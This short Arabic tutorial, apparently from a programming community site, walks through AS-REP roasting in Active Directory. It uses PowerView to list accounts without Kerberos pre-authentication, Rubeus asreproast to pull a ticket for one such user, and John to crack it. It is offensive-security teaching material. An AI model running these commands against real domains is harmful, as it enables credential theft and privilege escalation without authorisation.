Domain Privilege Escalation - AS-REP Attack
السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
في هذي المقالة راح نشرح التكينك الثاني لي الـDomain Privilege وهو الـAS-REP
قبل نبدا شرح التكنيك خلونا نعرف ايش هو تكنيك AS-REP ؟
الفكرة من هذا التكنيك بعض الـAdministror الخاصين بالـActive Directory يمنع احد المتسخدمين من Feature تسمى Kerberos Pre-Authentication
وهذا يتسبب في امكانية اخذ Ticket Granting Ticket الخاصه في هذا المستخدم اللي تم منعه من هذي الـFeature
الشرح:
الان راح نسوي Load لي اداة Power View Dev عن طريق هذا الامر:
Import-Module .\PowerView.ps1
الان راح ننفذ هذ الامر عشان يستخرج لنا المستخدمين اللي ماعندهم Kerberos Pre-Authentication
Get-DomainUser -PreauthNotRequired
نلاحظ مع بعض ان المستخدم Control173User ماعنده Kerberos Pre-Authentication
الان راح استخدم سكربت Rubeus عشان نستخرج الـTGT الخاص بالمستخدم عن طريق هذا الامر:
.\Rubeus.exe asreproast /user:Control173User
الان راح نسويله كراك عن طريق اداة John
وصلنا الى نهاية المقالة اتمنى انها نالت على اعجابكم
شاكر لكم.
التعليقات (0)
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !